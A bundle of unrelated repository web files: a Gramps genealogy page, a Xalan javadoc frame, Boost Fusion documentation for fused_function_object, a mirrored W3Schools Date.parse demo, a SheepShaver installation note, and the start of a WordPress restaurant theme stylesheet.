class="ColumnPlace"> <a href="../../../plc/t/y/SQ7KQCCJJW8KE175YT.html" title="Dunn, NC, USA"> Dunn, NC, USA </a> </td> <td class="ColumnDescription"> Burial of Peters, Rose </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </div> <div class="subsection" id="parents"> <h4>Parents</h4> <table class="infolist"> <thead> <tr> <th class="ColumnAttribute">Relation to main person</th> <th class="ColumnValue">Name</th> <th class="ColumnValue">Relation within this family (if not by birth)</th> </tr> </thead> <tbody> </tbody> <tr> <td class="ColumnAttribute">Father</td> <td class="ColumnValue"> <a href="../../../ppl/t/t/9EAKQCRLJ4HZ6I37TT.html">Peters, George Sr.<span class="grampsid"> [I0851]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">Mother</td> <td class="ColumnValue"> <a href="../../../ppl/m/g/BFAKQC7HD5G3UTIXGM.html">Ramsey, Joan<span class="grampsid"> [I0852]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/y/f/9D8KQCG5XB5D7J26FY.html">Peters, Rose<span class="grampsid"> [I0753]</span></a></td> <td class="ColumnValue"></td> </tr> </table> </div> <div class="subsection" id="families"> <h4>Families</h4> <table class="infolist"> <tr class="BeginFamily"> <td class="ColumnType">&nbsp</td> <td class="ColumnAttribute">&nbsp</td> <td class="ColumnValue"><a href="../../../fam/i/n/ZK3KQCS5KNNIOOMYNI.html" title="Family of Grenier, Joseph and Peters, Rose">Family of Grenier, Joseph and Peters, Rose<span class="grampsid"> [F0223]</span></a></td> </tr> <tr class="BeginFamily"> <td class="ColumnType">Married</td> <td class="ColumnAttribute">Husband</td> <td class="ColumnValue"> <a href="../../../ppl/q/v/4Q7KQCDUQYRHS71UVQ.html">Grenier, Joseph<span class="grampsid"> [I0752]</span></a> </td> </tr> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">&nbsp;</td> <td class="ColumnValue"> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Marriage </td> <td class="ColumnDate">1628</td> <td class="ColumnPlace"> <a href="../../../plc/u/t/FMALQCV1Q0QGJ3U6TU.html" title="Minneapolis, MN, USA"> Minneapolis, MN, USA </a> </td> <td class="ColumnDescription"> Marriage of Grenier, Joseph and Peters, Rose </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </td> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">Children</td> <td class="ColumnValue"> <ol> <li> <a href="../../../ppl/l/2/DK3KQCVPMBV5MM9U2L.html">Grenier, Mary<span class="grampsid"> [I0528]</span></a> </li> </ol> </td> </tr> </tr> </table> </div> <div class="subsection" id="familymap"> <h4>Family Map</h4> <a class="familymap" href="../../../maps/y/f/9D8KQCG5XB5D7J26FY.html" title="Family Map">Family Map</a> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <a href="../../../ppl/t/t/9EAKQCRLJ4HZ6I37TT.html">Peters, George Sr.<span class="grampsid"> [I0851]</span></a> <ol> <li class="spouse"> <a href="../../../ppl/m/g/BFAKQC7HD5G3UTIXGM.html">Ramsey, Joan<span class="grampsid"> [I0852]</span></a> <ol> <li class="thisperson"> Peters, Rose <ol class="spouselist"> <li class="spouse"> <a href="../../../ppl/q/v/4Q7KQCDUQYRHS71UVQ.html">Grenier, Joseph<span class="grampsid"> [I0752]</span></a> <ol> <li> <a href="../../../ppl/l/2/DK3KQCVPMBV5MM9U2L.html">Grenier, Mary<span class="grampsid"> [I0528]</span></a> </li> </ol> </li> </ol> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="tree"> <h4>Ancestors</h4> <div id="treeContainer" style="width:735px; height:602px;"> <div class="boxbg female AncCol0" style="top: 269px; left: 6px;"> <a class="noThumb" href="../../../ppl/y/f/9D8KQCG5XB5D7J26FY.html"> Peters, Rose </a> </div> <div class="shadow" style="top: 274px; left: 10px;"></div> <div class="bvline" style="top: 301px; left: 165px; width: 15px"></div> <div class="gvline" style="top: 306px; left: 165px; width: 20px"></div> <div class="boxbg male AncCol1" style="top: 119px; left: 196px;"> <a class="noThumb" href="../../../ppl/t/t/9EAKQCRLJ4HZ6I37TT.html"> Peters, George Sr. </a> </div> <div class="shadow" style="top: 124px; left: 200px;"></div> <div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 151px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 156px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 44px; left: 386px;"> <a class="noThumb" href="../../../ppl/m/3/JDAKQCGMZ5WI4JWV3M.html"> Peters, John </a> </div> <div class="shadow" style="top: 49px; left: 390px;"></div> <div class="bvline" style="top: 76px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 81px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 81px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol1" style="top: 419px; left: 196px;"> <a class="noThumb" href="../../../ppl/m/g/BFAKQC7HD5G3UTIXGM.html"> Ramsey, Joan </a> </div> <div class="shadow" style="top: 424px; left: 200px;"></div> <div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div> </div> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1"> Import from test2.ged <span class="grampsid"> [S0003]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25<br />Created for <a href="../../../ppl/h/o/GNUJQCL9MD64AM56OH.html">Garner von Zieliński, Lewis Anderson Sr</a> </p> <p id="copyright"> </p> </div> </body> </html>
lib/xalan-j_2_7_0/docs/apidocs/org/apache/xpath/domapi/package-frame.html
MrStaticVoid/iriverter
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Sat Aug 06 17:04:47 EDT 2005 --> <TITLE> Xalan-Java 2.7.0: Package org.apache.xpath.domapi </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../org/apache/xpath/domapi/package-summary.html" TARGET="classFrame">org.apache.xpath.domapi</A></FONT> <TABLE BORDER="0" WIDTH="100%"> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="XPathEvaluatorImpl.html" TARGET="classFrame">XPathEvaluatorImpl</A></FONT></TD> </TR> </TABLE> <TABLE BORDER="0" WIDTH="100%"> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Exceptions</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="XPathStylesheetDOM3Exception.html" TARGET="classFrame">XPathStylesheetDOM3Exception</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
lib/boost/boost_1_38_0/libs/fusion/doc/html/fusion/functional/adapters/fused_function_object.html
scs/uclinux
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>fused_function_object</title> <link rel="stylesheet" href="../../../../../../../doc/html/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.66.1"> <link rel="start" href="../../../index.html" title="Chapter 1. Fusion 2.0"> <link rel="up" href="../adapters.html" title=" Adapters"> <link rel="prev" href="fused_procedure.html" title="fused_procedure"> <link rel="next" href="unfused_generic.html" title="unfused_generic"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="fused_procedure.html"><img src="../../../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../adapters.html"><img src="../../../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="unfused_generic.html"><img src="../../../../../../../doc/html/images/next.png" alt="Next"></a> </div> <div class="section" lang="en"> <div class="titlepage"><div><div><h4 class="title"> <a name="fusion.functional.adapters.fused_function_object"></a><a href="fused_function_object.html" title="fused_function_object">fused_function_object</a></h4></div></div></div> <a name="fusion.functional.adapters.fused_function_object.description"></a><h5> <a name="id664533"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.description">Description</a> </h5> <p> An unary <a href="../concepts/poly.html" title=" Polymorphic Function Object">Polymorphic Function Object</a> adapter template for a <a href="../concepts/poly.html" title=" Polymorphic Function Object">Polymorphic Function Object</a> target function. It takes a <a href="../../sequence/concepts/forward_sequence.html" title="Forward Sequence">Forward Sequence</a> that contains the arguments for the target function. </p> <p> The type of the target function is allowed to be const qualified or a reference. Const qualification is preserved and propagated appropriately (in other words, only const versions of <tt class="literal">operator()</tt> can be used for an target function object that is const or, if the target function object is held by value, the adapter is const). </p> <p> /functional/adapter/fused_function_object.hpp&gt; </p> <a name="fusion.functional.adapters.fused_function_object.synopsis"></a><h5> <a name="id664615"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.synopsis">Synopsis</a> </h5> <pre class="programlisting"> <span class="keyword">template</span> <span class="special">&lt;</span><span class="keyword">class</span> <span class="identifier">Function</span><span class="special">&gt;</span> <span class="keyword">class</span> <span class="identifier">fused_function_object</span><span class="special">;</span> </pre> <a name="fusion.functional.adapters.fused_function_object.template_parameters"></a><h5> <a name="id664700"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.template_parameters">Template parameters</a> </h5> <div class="informaltable"><table class="table"> <colgroup> <col> <col> <col> </colgroup> <thead><tr> <th> <p> Parameter </p> </th> <th> <p> Description </p> </th> <th> <p> Default </p> </th> </tr></thead> <tbody><tr> <td> <p> <tt class="computeroutput"><span class="identifier">Function</span></tt> </p> </td> <td> <p> <a href="../concepts/poly.html" title=" Polymorphic Function Object">Polymorphic Function Object</a> type </p> </td> <td> <p> </p> </td> </tr></tbody> </table></div> <a name="fusion.functional.adapters.fused_function_object.model_of"></a><h5> <a name="id664816"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.model_of">Model of</a> </h5> <div class="itemizedlist"><ul type="disc"> <li><a href="../concepts/poly.html" title=" Polymorphic Function Object">Polymorphic Function Object</a></li> <li><a href="../concepts/def_callable.html" title=" Deferred Callable Object">Deferred Callable Object</a></li> </ul></div> <div class="variablelist"> <p class="title"><b>Notation</b></p> <dl> <dt><span class="term"><tt class="computeroutput"><span class="identifier">R</span></tt></span></dt> <dd><p> A possibly const qualified <a href="../concepts/poly.html" title=" Polymorphic Function Object">Polymorphic Function Object</a> type or reference type thereof </p></dd> <dt><span class="term"><tt class="computeroutput"><span class="identifier">r</span></tt></span></dt> <dd><p> An object convertible to <tt class="computeroutput"><span class="identifier">R</span></tt> </p></dd> <dt><span class="term"><tt class="computeroutput"><span class="identifier">s</span></tt></span></dt> <dd><p> A <a href="../../sequence.html" title="Sequence">Sequence</a> of arguments that are accepted by <tt class="computeroutput"><span class="identifier">r</span></tt> </p></dd> <dt><span class="term"><tt class="computeroutput"><span class="identifier">f</span></tt></span></dt> <dd><p> An instance of <tt class="computeroutput"><span class="identifier">fused</span><span class="special">&lt;</span><span class="identifier">R</span><span class="special">&gt;</span></tt> </p></dd> </dl> </div> <a name="fusion.functional.adapters.fused_function_object.expression_semantics"></a><h5> <a name="id665037"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.expression_semantics">Expression Semantics</a> </h5> <div class="informaltable"><table class="table"> <colgroup> <col> <col> </colgroup> <thead><tr> <th> <p> Expression </p> </th> <th> <p> Semantics </p> </th> </tr></thead> <tbody> <tr> <td> <p> <tt class="computeroutput"><span class="identifier">fused_function_object</span><span class="special">&lt;</span><span class="identifier">R</span><span class="special">&gt;(</span><span class="identifier">r</span><span class="special">)</span></tt> </p> </td> <td> <p> Creates a fused function as described above, initializes the target function with <tt class="computeroutput"><span class="identifier">r</span></tt>. </p> </td> </tr> <tr> <td> <p> <tt class="computeroutput"><span class="identifier">fused_function_object</span><span class="special">&lt;</span><span class="identifier">R</span><span class="special">&gt;()</span></tt> </p> </td> <td> <p> Creates a fused function as described above, attempts to use <tt class="computeroutput"><span class="identifier">R</span></tt>'s default constructor. </p> </td> </tr> <tr> <td> <p> <tt class="computeroutput"><span class="identifier">f</span><span class="special">(</span><span class="identifier">s</span><span class="special">)</span></tt> </p> </td> <td> <p> Calls <tt class="computeroutput"><span class="identifier">r</span></tt> with the elements in <tt class="computeroutput"><span class="identifier">s</span></tt> as its arguments. </p> </td> </tr> </tbody> </table></div> <a name="fusion.functional.adapters.fused_function_object.example"></a><h5> <a name="id665293"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.example">Example</a> </h5> <pre class="programlisting"> <span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">class</span> <span class="identifier">SeqOfSeqs</span><span class="special">,</span> <span class="keyword">class</span> <span class="identifier">Func</span><span class="special">&gt;</span> <span class="keyword">typename</span> <a href="../../algorithm/transformation/metafunctions/transform.html" title="transform"><tt class="computeroutput"><span class="identifier">result_of</span><span class="special">::</span><span class="identifier">transform</span></tt></a><span class="special">&lt;</span> <span class="identifier">zip_view</span><span class="special">&lt;</span><span class="identifier">SeqOfSeqs</span><span class="special">&gt;</span> <span class="keyword">const</span><span class="special">,</span> <span class="identifier">fused_function_object</span><span class="special">&lt;</span><span class="identifier">Func</span> <span class="keyword">const</span> <span class="special">&amp;&gt;</span> <span class="special">&gt;::</span><span class="identifier">type</span> <span class="identifier">n_ary_transform</span><span class="special">(</span><span class="identifier">SeqOfSeqs</span> <span class="keyword">const</span> <span class="special">&amp;</span> <span class="identifier">s</span><span class="special">,</span> <span class="identifier">Func</span> <span class="keyword">const</span> <span class="special">&amp;</span> <span class="identifier">f</span><span class="special">)</span> <span class="special">{</span> <span class="keyword">return</span> <a href="../../algorithm/transformation/functions/transform.html" title="transform"><tt class="computeroutput"><span class="identifier">transform</span></tt></a><span class="special">(</span><span class="identifier">zip_view</span><span class="special">&lt;</span><span class="identifier">SeqOfSeqs</span><span class="special">&gt;(</span><span class="identifier">s</span><span class="special">),</span> <span class="identifier">fused_function_object</span><span class="special">&lt;</span><span class="identifier">Func</span> <span class="keyword">const</span> <span class="special">&amp;&gt;(</span><span class="identifier">f</span><span class="special">));</span> <span class="special">}</span> <span class="keyword">struct</span> <span class="identifier">sub</span> <span class="special">{</span> <span class="keyword">template</span> <span class="special">&lt;</span><span class="keyword">typename</span> <span class="identifier">Sig</span><span class="special">&gt;</span> <span class="keyword">struct</span> <span class="identifier">result</span><span class="special">;</span> <span class="keyword">template</span> <span class="special">&lt;</span><span class="keyword">class</span> <span class="identifier">Self</span><span class="special">,</span> <span class="keyword">typename</span> <span class="identifier">T</span><span class="special">&gt;</span> <span class="keyword">struct</span> <span class="identifier">result</span><span class="special">&lt;</span> <span class="identifier">Self</span><span class="special">(</span><span class="identifier">T</span><span class="special">,</span><span class="identifier">T</span><span class="special">)</span> <span class="special">&gt;</span> <span class="special">{</span> <span class="keyword">typedef</span> <span class="keyword">typename</span> <span class="identifier">remove_reference</span><span class="special">&lt;</span><span class="identifier">T</span><span class="special">&gt;::</span><span class="identifier">type</span> <span class="identifier">type</span><span class="special">;</span> <span class="special">};</span> <span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">typename</span> <span class="identifier">T</span><span class="special">&gt;</span> <span class="identifier">T</span> <span class="keyword">operator</span><span class="special">()(</span><span class="identifier">T</span> <span class="identifier">lhs</span><span class="special">,</span> <span class="identifier">T</span> <span class="identifier">rhs</span><span class="special">)</span> <span class="keyword">const</span> <span class="special">{</span> <span class="keyword">return</span> <span class="identifier">lhs</span> <span class="special">-</span> <span class="identifier">rhs</span><span class="special">;</span> <span class="special">}</span> <span class="special">};</span> <span class="keyword">void</span> <span class="identifier">try_it</span><span class="special">()</span> <span class="special">{</span> <a href="../../container/vector.html" title="vector"><tt class="computeroutput"><span class="identifier">vector</span></tt></a><span class="special">&lt;</span><span class="keyword">int</span><span class="special">,</span><span class="keyword">float</span><span class="special">&gt;</span> <span class="identifier">a</span><span class="special">(</span><span class="number">2</span><span class="special">,</span><span class="number">2.0f</span><span class="special">);</span> <a href="../../container/vector.html" title="vector"><tt class="computeroutput"><span class="identifier">vector</span></tt></a><span class="special">&lt;</span><span class="keyword">int</span><span class="special">,</span><span class="keyword">float</span><span class="special">&gt;</span> <span class="identifier">b</span><span class="special">(</span><span class="number">1</span><span class="special">,</span><span class="number">1.5f</span><span class="special">);</span> <a href="../../container/vector.html" title="vector"><tt class="computeroutput"><span class="identifier">vector</span></tt></a><span class="special">&lt;</span><span class="keyword">int</span><span class="special">,</span><span class="keyword">float</span><span class="special">&gt;</span> <span class="identifier">c</span><span class="special">(</span><span class="number">1</span><span class="special">,</span><span class="number">0.5f</span><span class="special">);</span> <span class="identifier">assert</span><span class="special">(</span><span class="identifier">c</span> <span class="special">==</span> <span class="identifier">n_ary_transform</span><span class="special">(</span><a href="../../container/generation/functions/vector_tie.html" title="vector_tie"><tt class="computeroutput"><span class="identifier">vector_tie</span></tt></a><span class="special">(</span><span class="identifier">a</span><span class="special">,</span><span class="identifier">b</span><span class="special">),</span> <span class="identifier">sub</span><span class="special">()));</span> <span class="special">}</span> </pre> <a name="fusion.functional.adapters.fused_function_object.see_also"></a><h5> <a name="id666351"></a> <a href="fused_function_object.html#fusion.functional.adapters.fused_function_object.see_also">See also</a> </h5> <div class="itemizedlist"><ul type="disc"> <li><a href="fused.html" title="fused"><tt class="computeroutput"><span class="identifier">fused</span></tt></a></li> <li><a href="fused_procedure.html" title="fused_procedure"><tt class="computeroutput"><span class="identifier">fused_procedure</span></tt></a></li> <li><a href="../invocation/functions/invoke_fobj.html" title=" invoke_function_object"><tt class="computeroutput"><span class="identifier">invoke_function_object</span></tt></a></li> <li><a href="../../support/deduce.html" title="deduce"><tt class="computeroutput"><span class="identifier">deduce</span></tt></a></li> </ul></div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright © 2001-2007 Joel de Guzman, Dan Marsden, Tobias Schwinger<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="fused_procedure.html"><img src="../../../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../adapters.html"><img src="../../../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="unfused_generic.html"><img src="../../../../../../../doc/html/images/next.png" alt="Next"></a> </div> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/js/tryitb7f3.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="en-US"> <!-- Mirrored from www.w3schools.com/js/tryit.asp?filename=tryjs_date_convert by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:35:52 GMT --> <head> <title>Tryit Editor v2.3</title> <meta id="viewport" name='viewport'> <script> (function() { if ( navigator.userAgent.match(/iPad/i) ) { document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9"); } }()); </script> <link rel="stylesheet" href="../trycss.css"> <!--[if lt IE 8]> <style> .textareacontainer, .iframecontainer {width:48%;} .textarea, .iframe {height:800px;} #textareaCode, #iframeResult {height:700px;} .menu img {display:none;} </style> <![endif]--> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','../../www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-3855518-1', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> <script> var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; (function() { var gads = document.createElement('script'); gads.async = true; gads.type = 'text/javascript'; var useSSL = 'https:' == document.location.protocol; gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js'; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(gads, node); })(); </script> <script> googletag.cmd.push(function() { googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads()); googletag.pubads().setTargeting("content","tryjs"); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> <script type="text/javascript"> function submitTryit() { var t=document.getElementById("textareaCode").value; t=t.replace(/=/gi,"w3equalsign"); var pos=t.search(/script/i) while (pos>0) { t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6); pos=t.search(/script/i); } if ( navigator.userAgent.match(/Safari/i) ) { t=escape(t); document.getElementById("bt").value="1"; } document.getElementById("code").value=t; document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random(); validateForm(); document.getElementById("iframeResult").contentWindow.name = "view"; document.getElementById("tryitform").submit(); } function validateForm() { var code=document.getElementById("code").value; if (code.length>8000) { document.getElementById("code").value="<h1>Error</h1>"; } } </script> <style> </style> </head> <body> <div id="ads"> <div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;"> <div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;"> <!-- TryitLeaderboard --> <div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'> <script type='text/javascript'> googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); }); </script> </div> <div style="clear:both"></div> </div> </div> </div> <div class="container"> <div class="textareacontainer"> <div class="textarea"> <div class="headerText" style="width:auto;float:left;">Edit This Code:</div> <div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result &raquo;</button></div> <div class="textareawrapper"> <textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html> <html> <body> <p>Date.parse(string) returns milliseconds.</p> <p>You can use the return value to convert the string to a date object:</p> <p id="demo"></p> <script> var msec = Date.parse("March 21, 2012"); var d = new Date(msec); document.getElementById("demo").innerHTML = d; </script> </body> <!-- Mirrored from www.w3schools.com/js/tryit.asp?filename=tryjs_date_convert by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:35:52 GMT --> </html> </textarea> <form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/js/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();"> <input type="hidden" name="code" id="code" /> <input type="hidden" id="bt" name="bt" /> </form> </div> </div> </div> <div class="iframecontainer"> <div class="iframe"> <div class="headerText resultHeader">Result:</div> <div class="iframewrapper"> <iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjs_date_convert.html"></iframe> </div> <div class="footerText">Try it Yourself - &copy; <a href="../index.html">w3schools.com</a></div> </div> </div> </div> <script>submitTryit()</script> </body> </html>
doc/Haiku/installation.html
kallisti5/sheepshear
<HTML> <HEAD> <TITLE>Installation</TITLE> </HEAD> <BODY BGCOLOR=#FFFFFF> <H1>Installation</H1> You need Haiku/PowerPC R4. R3 or earlier versions will not work. <OL> <LI>Unpack the SheepShaver package (if you are reading this, you probably have already done this) <LI>On a BeBox, you need a copy of a PCI PowerMac ROM (4MB) in a file called "ROM" in the same folder SheepShaver is in (but you can select a different location in the settings window). SheepShaver can also use the "Mac OS ROM" file that comes with MacOS 8.5/8.6 (look in the System Folder on your MacOS CD). In order to legally use SheepShaver, you have to own the ROM the image file was taken from. </OL> <HR> <ADDRESS> SheepShaver User's Guide </ADDRESS> </BODY> </HTML>
wp-content/themes/restaurant/style.css
RuslanGrigoryev/wp_restaraunt
/* Theme Name: Restaurant Theme URI: http://opal375.ru Description: Easy to use but functional responsive theme to build a website for restaurants or other types of business that work on any device. Features include a loading page, an intergrated slider library to manage sliders, and optional Google Map plugins, Restaurant SimpleBooings plugins (available at Designpromote.co.uk/wordpress). Author: Ruslan Grigoryev Author URI: Ruslan Grigoryev Template: twentytwelve Version: 1.10 License: GNU General Public License v2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Tags: light, one-column, two-columns, flexible-width, custom-header, full-width-template, flexible-width Text Domain: restaurant Restaurant theme, photos/images included are licensed under the GPL. jQuery FlexSlider v2.0 Copyright 2012 WooThemes */ @import url("../twentytwelve/style.css"); /* =Basic structure */ body { background: url(images/bg-main.jpg)no-repeat center center fixed; -webkit-background-size: cover; /* For WebKit*/ -moz-background-size: cover; /* Mozilla*/ -o-background-size: cover; /* Opera*/ background-size: cover; /* Generic*/ } a { outline: none; color: #660000; } a:hover { color: #0f3647; } /* Page structure */ #top-page { display:block;float:left;height:5px;width:100%;background-color:#660000; } .site-header { padding: 24px 0 12px; padding: 1.714285714rem 0 0.86rem; } .site-content { margin: 0; padding-left: 14px; } .site-content.front-page { padding-left: 0; } .home-widget { display: block; float: left; width: 100%; } .main-navigation { margin-top: 12px; } hgroup, .main-navigation ul, footer .site-info { padding: 0 1rem; padding: 0 14px; } /* Navigation Menu */ .main-navigation li { font-size: 13px; font-size: 1rem; line-height: 1.42857143; } .main-navigation a { color: #660000; } .main-navigation a:hover { color: #21759b; } /* Header */ .site-header h1 a, .site-header h2 a { color: #660000; display: inline-block; text-decoration: none; } .site-header h1 a:hover, .site-header h2 a:hover { color: #660000; } .site-header h1 { color: #660000; font-size: 28px; font-family: "Times New Roman",Times,serif; /*font-size: 1.714285714rem;*/ line-height: 1.285714286; /*line-height: 1;*/ margin-bottom: 8px; } .site-header h2 { color: #749e6e; /*margin-top: -10px;*/ line-height: 1.4; } .site-header .site-contact{ margin-top: 8px; } .site-header .site-contact, .site-header .site-contact .widget{ /*float:right; display:none; margin-top:-50px;*/ color: #000; line-height: 1.4; text-align: center; } .site-header .site-contact a { color: #515151; text-decoration: none; } .flex-caption{ color: #fff; font-size: 17px; font-size:1.2rem; font-weight: normal; line-height: 1.4; background-color: #660000; opacity: 0.6; filter: alpha(opacity=60); padding: 5px; position: absolute; bottom: 10%; right:0; /*left:500px;*/ width: 40%; /*margin-top: -35px;*/ } /* homewidget */ /*.template-front-page .home-widget .widget-title,*/ .home-widget .widget-title { line-height: 2.181818182; background-color: #660000; color: #fff; text-align: center; display: block; font-weight: normal; font-size: 14px; font-size: 1rem; } .home-widget .widget { margin-bottom: 25px; } .home-widget .textwidget { line-height: 1.846153846; /*padding: 0 5px;*/ } .home-widget img{ float:left; margin-right: 5px; } .home-widget img:hover { opacity: 0.7; filter:Alpha(opacity=70); /* ie8 and earlier */ } /* =Main content and comment content */ .entry-header { margin-bottom: 24px; margin-bottom: 1.714285714rem; margin-top: 24px; margin-top: 1.714285714rem; } .template-front-page .entry-header { display: none; } .template-front-page .entry-content h2{ margin: 0; } .entry-content h3 a[target="_blank"]:after, .entry-content h3 a[target="new"]:after { margin: 0; } .entry-content .menu-text { background: none; padding-bottom: 10px; } .entry-content .menu-title { color:#fff; margin-bottom:1px; padding: 5px; background-color:#660000; text-align: left; } .entry-content .menu-top{ float:right; } .entry-content .toggle-sign { display: inline-block; width: 10px; font-weight: bold; color: #fff; } .widget-area .widget input[type="button"], .content-area input[type="button"], .head-widget input[type="button"]{ width: 150px; color: #ffffff; background-color: #660000; background-repeat: repeat-x; background-image: -moz-linear-gradient(top, #660000, #660000); background-image: -ms-linear-gradient(top, #660000, #660000); background-image: -webkit-linear-gradient(top, #660000, #660000); background-image: -o-linear-gradient(top, #660000, #660000); background-image: linear-gradient(top, #660000, #660000); border: 1px solid #660000; } .content-area input[type="button"] { margin: 0 auto; display: block; } select{ border: 1px solid #ccc; border-radius: 3px; 